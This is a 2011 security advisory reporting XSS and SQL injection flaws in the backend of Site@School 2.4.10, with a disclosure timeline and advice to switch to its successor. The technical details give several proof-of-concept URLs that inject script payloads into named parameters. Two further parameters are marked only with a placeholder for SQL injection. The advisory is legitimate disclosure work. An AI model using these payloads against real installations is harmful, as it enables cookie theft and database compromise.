Advisory: Site@School 2.4.10 SQL Injection & XSS vulnerabilities Advisory ID: SSCHADV2011-030 Author: Stefan Schurtz Affected Software: Successfully tested on Site@School 2.4.10 Vendor URL: http://sourceforge.net/projects/siteatschool/ Vendor Status: insecure and no longer maintained CVE-ID: - ========================== Vulnerability Description: ========================== Site@School is prone to multiple SQL Injection and XSS vulnerabilities ================== Technical Details: ================== Backend - XSS http://<target>/school/starnet/index.php?option=stats&suboption='"</style></script><script>alert(document.cookie)</script> http://<target>/school/starnet/index.php?option=pagemanager&suboption=newsection&site='"</style></script><script>alert(document.cookie)</script> http://<target>/school/starnet/index.php?option=modulemanager&modoption=edit&module_number="</style></script><script>alert(document.cookie)</script> http://<target>/school/starnet/index.php?option=modulemanager&module='"</style></script><script>alert(document.cookie)</script> Backend - SQL Injection http://<target>/school/starnet/index.php?option=modulemanager&modoption=edit&module_number=[sql injection] http://<target>/school/starnet/index.php?option=modulemanager&module=[sql injection] ========= Solution: ========= Site@School: insecure and no longer maintained. Do not download it. Please use its successor: Website@School ==================== Disclosure Timeline: ==================== 07-Oct-2011 - informed developers 08-Oct-2011 - response from vendor 18-Oct-2011 - release date of this security advisory ======== Credits: ======== Vulnerabilities found and advisory written by Stefan Schurtz. =========== References: =========== http://sourceforge.net/projects/siteatschool/ http://www.rul3z.de/advisories/SSCHADV2011-030.txt
